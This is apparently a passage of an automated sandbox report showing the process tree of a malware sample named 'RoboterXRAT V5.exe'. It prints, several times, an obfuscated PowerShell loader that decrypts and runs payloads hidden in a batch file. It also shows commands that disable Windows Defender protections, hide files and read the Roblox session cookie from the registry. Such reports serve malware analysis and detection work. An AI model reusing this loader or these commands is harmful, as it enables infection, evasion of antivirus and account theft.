$qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        9⤵
        
        PID:568
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        10⤵
        
        PID:2796
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        10⤵
        
        PID:1428
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        10⤵
        
        PID:676
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        8⤵
        
        PID:1700
        
        C:\Windows\system32\net.exe
        
        net file
        9⤵
        
        PID:1864
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        10⤵
        
        PID:1668
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        9⤵
        
        PID:1572
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        8⤵
        
        PID:1800
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        9⤵
        
        PID:1788
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        10⤵
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        11⤵
        
        PID:3004
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        12⤵
        
        PID:2232
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        13⤵
        
        PID:288
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        14⤵
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        15⤵
        
        PID:808
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        16⤵
        
        PID:1760
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        17⤵
        
        PID:1548
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        18⤵
        
        PID:2552
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        19⤵
        
        PID:1780
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        20⤵
        
        PID:1724
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        21⤵
        
        PID:1948
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        22⤵
        
        PID:2044
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        23⤵
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        24⤵
        
        PID:1584
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        25⤵
        
        PID:1196
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        26⤵
        
        PID:2012
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        27⤵
        
        PID:2112
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        28⤵
        
        PID:768
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        28⤵
        
        PID:2420
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        28⤵
        
        PID:404
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        27⤵
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        27⤵
        
        PID:1132
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        26⤵
        
        PID:1108
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        26⤵
        
        PID:1688
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        27⤵
        
        PID:1584
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        27⤵
        Views/modifies file attributes
        
        PID:1912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        27⤵
        
        PID:2172
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2140
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        27⤵
        
        PID:2792
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        27⤵
        
        PID:1108
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        27⤵
        
        PID:2012
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        27⤵
        
        PID:1692
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2088
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        27⤵
        Detects videocard installed
        
        PID:1632
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        27⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:264
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        28⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2812
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        25⤵
        
        PID:1920
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        25⤵
        
        PID:264
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        24⤵
        
        PID:2240
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        24⤵
        
        PID:1116
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        23⤵
        
        PID:2560
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        23⤵
        
        PID:1004
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        22⤵
        
        PID:956
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        22⤵
        
        PID:1720
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        21⤵
        
        PID:2400
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        21⤵
        
        PID:2768
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        20⤵
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        20⤵
        
        PID:1156
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        19⤵
        
        PID:1096
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        19⤵
        
        PID:2624
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        18⤵
        
        PID:1604
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        18⤵
        
        PID:2904
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        17⤵
        
        PID:2784
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        17⤵
        
        PID:236
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        16⤵
        
        PID:392
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        16⤵
        
        PID:568
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        15⤵
        
        PID:868
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        15⤵
        
        PID:1576
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        14⤵
        
        PID:2768
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        14⤵
        
        PID:988
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        13⤵
        
        PID:2760
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        13⤵
        
        PID:1560
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        12⤵
        
        PID:2964
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        12⤵
        
        PID:2660
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        11⤵
        
        PID:2900
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        11⤵
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        10⤵
        
        PID:1556
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        10⤵
        
        PID:2312
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        9⤵
        
        PID:2040
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        9⤵
        
        PID:2208
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        7⤵
        
        PID:2800
        
        C:\Windows\system32\net.exe
        
        net file
        8⤵
        
        PID:1516
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        9⤵
        
        PID:1656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        8⤵
        
        PID:2868
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        7⤵
        
        PID:1476
      - C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        6⤵
        
        PID:2876
        
        C:\Windows\system32\net.exe
        
        net file
        7⤵
        
        PID:2624
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        8⤵
        
        PID:2712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2728
      - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        6⤵
        
        PID:2072
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        7⤵
        
        PID:1336
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        8⤵
        
        PID:816
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        9⤵
        
        PID:1476
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        10⤵
        
        PID:2540
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        11⤵
        
        PID:1624
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        12⤵
        
        PID:2956
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        13⤵
        
        PID:1712
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        14⤵
        
        PID:1668
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        14⤵
        
        PID:1920
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        14⤵
        
        PID:2244
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        13⤵
        
        PID:2488
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        13⤵
        
        PID:2368
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        12⤵
        
        PID:2700
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        12⤵
        
        PID:628
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        11⤵
        
        PID:2960
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        11⤵
        
        PID:2312
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        10⤵
        
        PID:2780
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        10⤵
        
        PID:640
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        9⤵
        
        PID:2952
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        9⤵
        
        PID:2216
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        8⤵
        
        PID:2152
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        8⤵
        
        PID:1556
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        7⤵
        
        PID:1208
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        7⤵
        
        PID:1584
    - - C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        5⤵
        
        PID:3040
      - C:\Windows\system32\net.exe
        
        net file
        6⤵
        
        PID:1916
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        7⤵
        
        PID:1516
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        
        PID:916
    - - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        5⤵
        
        PID:988
  - - C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2000
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2008
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:2820
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
